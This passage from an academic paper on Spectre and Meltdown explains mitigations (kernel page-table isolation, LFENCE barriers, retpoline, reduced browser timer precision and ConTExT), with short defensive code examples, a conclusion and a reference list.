rely on accessing user memory from the kernel, and instead followed the approach of making
user-space memory non-executable in kernel space.
Furthermore, they disabled the global bit of kernel pages in the TLB, which according to them
has no performance impact and, together with the shadow address spaces, provides complete
protection against leaking memory from kernel space. The switches between the shadow address
spaces do not require flushing the TLB, which keeps the performance impact minimal.

Because of its small performance impact and its complete protection against Meltdown (but not
against its successors like LVI, as already stated), which moreover does not require recompiling
any software, this patch is as of today applied to most modern operating systems.

5.1.2 LFENCE
LFENCE is an x86 instruction which blocks further execution until all preceding loads have
completed. Inserting it serializes the program code at this point, but since speculative execution
is a hardware feature, LFENCE cannot prevent it in general.

So it would only prevent Spectre V1 on conditional branches but not Spectre V2 with branch
poisoning. It also has several drawbacks:
The first is that it really slows down execution and can therefore only be used at really critical
instructions. With this it is in the hands of the programmer, who has to have a good understanding
of speculative execution and has to carefully decide where to use it, and it is more than likely
that some spots are overlooked.

So even though it is a good start for a mitigation, it does not fix the problem.
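To illustrate where such a barrier would be placed, a hardened version of the code from figure 4
could look as follows in C (using the _mm_lfence intrinsic; whether this is sufficient for a given
compiler and CPU is an assumption of this sketch):

    #include <stddef.h>
    #include <stdint.h>
    #include <emmintrin.h>   /* _mm_lfence */

    extern uint8_t array1[16];
    extern unsigned int array1_size;
    extern uint8_t array2[256 * 256];

    uint8_t victim_function(size_t x) {
        uint8_t y = 0;
        if (x < array1_size) {
            /* speculation barrier: the dependent loads below cannot start
               before all preceding instructions, including the bounds check,
               have completed */
            _mm_lfence();
            y = array2[array1[x] * 256];
        }
        return y;
    }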

5.1.3 Retpoline
Retpoline is a technique developed by Google [9] against the poisoning of indirect branches. The
main idea is that even though one cannot prevent the CPU from speculatively executing, one can
trick it into the developer's own, harmless speculative execution. The name is composed of
ret(urn) and trampoline, which also describes the idea behind it: to trap the speculation on the
function return in an infinite loop until the required data has arrived.

Since the target of an indirect call or jump has to be predicted by the CPU, the idea behind
retpoline is to trap the branch predictor in always speculatively executing the same harmless
code until the real return address has been computed.

1 call set_up_target;    (1)
2 capture_spec:          (4)
3     pause;
4     jmp capture_spec;
5 set_up_target:
6     mov %r11, (%rsp);   (2)
7     ret;                (3)

Figure 12: Example x86 assembly which shows the implementation of retpoline

The implementation of retpoline can be seen in figure 12. The call to set_up_target (1) pushes
the address which corresponds to line 2 in the example onto the stack as the return address.
set_up_target then changes this return address with a memory access (2). Since the CPU has
to wait for the result of this access to arrive at (3), it speculatively returns to the address on the
stack, and this is where the retpoline technique comes in: the speculative execution is captured
in the loop at (4), and when the real address finally arrives after a few hundred cycles, this
speculation is discarded without having accessed any information.

Since the CPU naturally has to wait for the memory address to jump to anyway, retpoline has
almost no performance impact. It merely disables the built-in prediction of the jump target, and
for known indirect branches this can be compensated by manually providing the information at
compile time.

5.1.4 Timer Inaccuracy in JavaScript


Another viable approach to make side-channel attacks impossible is to artificially reduce the
accuracy of timers. Such an approach does not apply to every program, but especially in
sandboxed environments like browsers this was a measure taken by all well-known browser
manufacturers like Mozilla [20], Google [8] and Microsoft [19].
All of them made the high-precision timers in their browsers less accurate, so that even though
the security hole is still present and one can still trick the CPU into wrong speculative execution,
it is no longer possible to read out data between different tabs, at a cost that is negligible for
most JavaScript used on websites.

5.2 Hardware Mitigations


Since hardware mitigations require a long time to be tested and shipped before they can be
applied, most patches so far were made either in software or in the microcode of processors. The
development departments of the well-known processor manufacturers did announce that several
tweaks were made to their architectures to somehow mitigate the issues, but the details are
mostly not public.

After all, in 2020 Schwarz et al. [23] developed a mixed hardware/software approach called
ConTExT that requires only small tweaks in hardware, but also some new concepts in
programming, and tries to mitigate the issue in general.

5.2.1 ConTExT
As already stated, ConTExT (Considerate Transient Execution Technique) is a general approach
to mitigate the whole Spectre family by moving the responsibility up to the highest level of
software development, the actual code. It introduces a new non-transient bit for page-table
entries and registers, which indicates to the CPU that it should use a dummy value instead of
the actual one during transient execution.
This not only ensures that memory locations are protected against speculative attacks but also
registers. After all, ConTExT is an overall approach which affects every part of a computer
system: the processor, which keeps track of the secrets; the operating system, which must be
aware of secrets in registers during context switches; the compiler, which translates the new
secret annotations into machine-level information; and the actual code, which needs a new
annotation for secret values.

It makes the assumption that it is in general distinguishable whether a value is secret or not.
This distinction has to be made by the programmer, who has to annotate such values as secret
for ConTExT. With this information the compiler can place the secret values in an additional
section of the resulting binary. This section is backed by memory pages which have the
non-transient bit set, and every such value in use is tracked by the hardware by also storing this
bit in the registers of the CPU. When such a value is needed in an execution and the CPU would
use it speculatively, it first checks the bit, and if it is set it suppresses the speculative use.
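Purely as an illustration of what such an annotation could look like in C, the following sketch
uses a GCC-style section attribute to emulate the idea of a dedicated secret section; this is not
the actual ConTExT syntax, just a hypothetical approximation:

    #include <stddef.h>
    #include <stdint.h>

    /* Hypothetical annotation: place the key in a dedicated ".secret" section.
       Under ConTExT, the pages backing such a section would carry the
       non-transient bit, so the CPU would only feed dummy values into transient
       execution instead of the real key bytes. */
    #define SECRET __attribute__((section(".secret")))

    SECRET static uint8_t aes_key[16] = { 0 /* key material elided */ };

    uint8_t use_key(size_t i) {
        /* normal, architectural use of the key is unaffected */
        return aes_key[i % sizeof aes_key];
    }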

In the end the authors report that this approach has a performance overhead between 0% and
338%, while fully mitigating all known Spectre attacks, and that it can even be easily adapted to
every new variant that comes out.

6 Conclusion
With all this knowledge it is not hard to say that neither Spectre nor Meltdown is really a tamed
ghost. Even though every actor in the game is actively trying to fix the urgent problems, there
is, until today, no general approach commonly adopted in processors that fixes the problems of
out-of-order and speculative execution. A real fix for the problems can only come with a
substantial redesign of the processor architecture, as seen in section 5.2, and this requires all
hardware to be exchanged, which will take a very long time. Until then, the only viable
alternative is to react proactively to new variants and to try to fix them in software as far as
possible. After all, this problem will bother us for a long time yet.

Furthermore, these attacks have made side-channel attacks in particular, but also hardware
attacks in general, a really popular scientific field, and it is to be expected that they will have a
much bigger impact in the future as they are more widely adopted by attackers and more
researchers concentrate on this topic.

All discussions about mitigations for the attacks have a strong focus on performance, which is
understandable in an economic sense, since the performance gain of speculative and out-of-order
execution is too big to give up.
But since we are at a point where current processor architectures can no longer keep up with
Moore's law and making the structures ever smaller is coming to an end, it is necessary to switch
to new architectural approaches to improve performance further. So it would be a good
opportunity to take this chance and develop new architectures which are affected by neither
Spectre nor Meltdown.

For the future it will be much more important that hardware engineers do not only focus on
performance at all cost, but shift their attention more towards the security aspects of processors,
to ensure that the data of a user is protected even in hostile environments where multiple users
share a single physical machine, as with virtual machines and cloud computing.

References
[1] CLFLUSH Documentation. Available at https://www.felixcloutier.com/x86/clflush.
[2] AMD: AMD Ryzen Specification. Available at http://www.cpu-world.com/CPUs/Zen/AMD-Ryzen%
209%203900.html.
[3] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner,
Frank Piessens, Dmitry Evtyushkin & Daniel Gruss: A Systematic Evaluation of Transient Execution
Attacks and Defenses.
[4] Thomas Claburn: Foreshadow returns to the foreground: Secrets-spilling speculative-execution In-
tel flaw lives on, say boffins. Available at https://www.theregister.com/2020/08/07/foreshadow_
strikes_back_boffins_find/.
[5] Ryan Crosby (2018): SpectrePoC. Available at https://github.com/crozone/SpectrePoC.
[6] Jeffrey Friedman (1972): Tempest: A signal problem. NSA Cryptologic Spectrum 35, p. 76.
[7] Ulf Frisk (2018): Total Meltdown? Available at http://blog.frizk.net/2018/03/total-meltdown.
html.
[8] Google: Mitigating Side-Channel Attacks. Available at https://www.chromium.org/Home/
chromium-security/ssca.
[9] Google: Retpoline. Available at https://support.google.com/faqs/answer/7625886.
[10] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice & Stefan Mangard
(2017): Kaslr is dead: long live kaslr. In: International Symposium on Engineering Secure Software
and Systems, Springer, pp. 161–176.
[11] Daniel Gruss, Raphael Spreitzer & Stefan Mangard (2015): Cache template attacks: Automating
attacks on inclusive last-level caches. In: 24th {USENIX} Security Symposium ({USENIX} Security
15), pp. 897–912.
[12] Heise (2018): CPU-Sicherheitslücken Spectre-NG: Updates und Info-Links. Available at https://
www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-und-Info-Links-4053268.
html.
[13] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai & O. Mutlu (2014):
Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors.
In: 2014 ACM/IEEE 41st International Symposium on Computer Architecture (ISCA), pp. 361–372.
[14] Olaf Kirch (2018): Meltdown and Spectre Performance. Available at https://www.suse.com/c/
meltdown-spectre-performance/.
[15] Paul Kocher, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Man-
gard, Thomas Prescher, Michael Schwarz & Yuval Yarom: Spectre Attacks: Exploiting Speculative
Execution.
[16] Paul C Kocher (1996): Timing attacks on implementations of Diffie-Hellman, RSA, DSS, and other
systems. In: Advances in Cryptology – CRYPTO '96, Springer, pp. 104–113.
[17] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul
Kocher, Daniel Genkin, Yuval Yarom & Mike Hamburg: Meltdown.
[18] F. Liu, Y. Yarom, Q. Ge, G. Heiser & R. B. Lee (2015): Last-Level Cache Side-Channel Attacks are
Practical. In: 2015 IEEE Symposium on Security and Privacy, pp. 605–622, doi:10.1109/SP.2015.43.
[19] Microsoft: Mitigating speculative execution side-channel attacks in Microsoft Edge and
Internet Explorer. Available at https://blogs.windows.com/msedgedev/2018/01/03/
speculative-execution-mitigations-microsoft-edge-internet-explorer/.

[20] Mozilla: Mitigations landing for new class of timing attack. Available at https://blog.mozilla.
org/security/2018/01/03/mitigations-landing-new-class-timing-attack/.
[21] Dag Arne Osvik, Adi Shamir & Eran Tromer (2006): Cache Attacks and Countermeasures: The
Case of AES. In David Pointcheval, editor: Topics in Cryptology – CT-RSA 2006, Springer Berlin
Heidelberg, Berlin, Heidelberg, pp. 1–20.
[22] Paul A. Grassi, Michael E. Garcia & James L. Fenton (2017): NIST Special Publication
800-63-3, Digital Identity Guidelines. National Institute of Standards and Technology,
doi:https://doi.org/10.6028/NIST.SP.800-63-3.
[23] Michael Schwarz, Moritz Lipp, Claudio Canella, Robert Schilling, Florian Kargl & Daniel Gruss
(2020): Context: A generic approach for mitigating spectre. In: Proceedings of the 27th Annual
Network and Distributed System Security Symposium (NDSS20). Internet Society, Reston, VA.
[24] Michael Schwarz, Martin Schwarzl, Moritz Lipp, Jon Masters & Daniel Gruss (2019): Netspectre:
Read arbitrary memory over network. In: European Symposium on Research in Computer Security,
Springer, pp. 279–299.
[25] François-Xavier Standaert (2010): Introduction to side-channel attacks. In: Secure integrated circuits
and systems, Springer, pp. 27–42.
[26] Yukiyasu Tsunoo, Teruo Saito, Tomoyasu Suzaki, Maki Shigeri & Hiroshi Miyauchi (2003): Crypt-
analysis of DES Implemented on Computers with Cache. In Colin D. Walter, Çetin K. Koç &
Christof Paar, editors: Cryptographic Hardware and Embedded Systems - CHES 2003, Springer
Berlin Heidelberg, Berlin, Heidelberg, pp. 62–76.
[27] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark
Silberstein, Thomas F Wenisch, Yuval Yarom & Raoul Strackx (2018): Foreshadow: Extracting the
keys to the intel {SGX} kingdom with transient out-of-order execution. In: 27th {USENIX} Security
Symposium ({USENIX} Security 18), pp. 991–1008.
[28] Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin,
Yuval Yarom, Berk Sunar, Daniel Gruss & Frank Piessens (2020): LVI: Hijacking transient execution
through microarchitectural load value injection. In: 2020 IEEE Symposium on Security and Privacy
(SP), IEEE, pp. 54–72.
[29] Yuval Yarom & Katrina Falkner (2014): FLUSH+ RELOAD: a high resolution, low noise, L3 cache
side-channel attack. In: 23rd {USENIX} Security Symposium ({USENIX} Security 14), pp. 719–732.
